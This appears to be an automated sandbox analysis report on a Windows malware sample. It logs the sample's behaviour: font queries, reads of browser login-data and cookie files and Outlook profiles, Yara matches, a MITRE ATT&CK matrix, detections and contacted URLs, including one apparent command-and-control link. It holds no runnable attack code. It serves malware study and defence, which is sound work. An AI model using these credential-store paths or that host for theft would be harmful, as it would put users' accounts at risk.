Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.e6o7hKFmfC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.e6o7hKFmfC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e6o7hKFmfC.exe.3fc6e58.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\cmmon32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cmmon32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.e6o7hKFmfC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.e6o7hKFmfC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e6o7hKFmfC.exe.3fc6e58.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	512 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	1 Input Capture	2 Process Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	5 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	512 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	1 Data from Local System	Scheduled Transfer	115 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	13 Software Packing	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
e6o7hKFmfC.exe	21%	Virustotal		Browse
e6o7hKFmfC.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.e6o7hKFmfC.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.e6o7hKFmfC.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.e6o7hKFmfC.exe.400000.8.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.e6o7hKFmfC.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.carterandcone.comGEn	0%	Avira URL Cloud	safe
http://www.carterandcone.comgra	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.carterandcone.com#	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.domainedelapoujade.info/uem3/?SH=IDKTKDM&BpE=V2TDWYSqi/8fdllEzj4AbTg97NFaRkku6BamUZomS0y+YREnVG6xukPcgSdf2jxlzQp6	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cno	0%	URL Reputation	safe
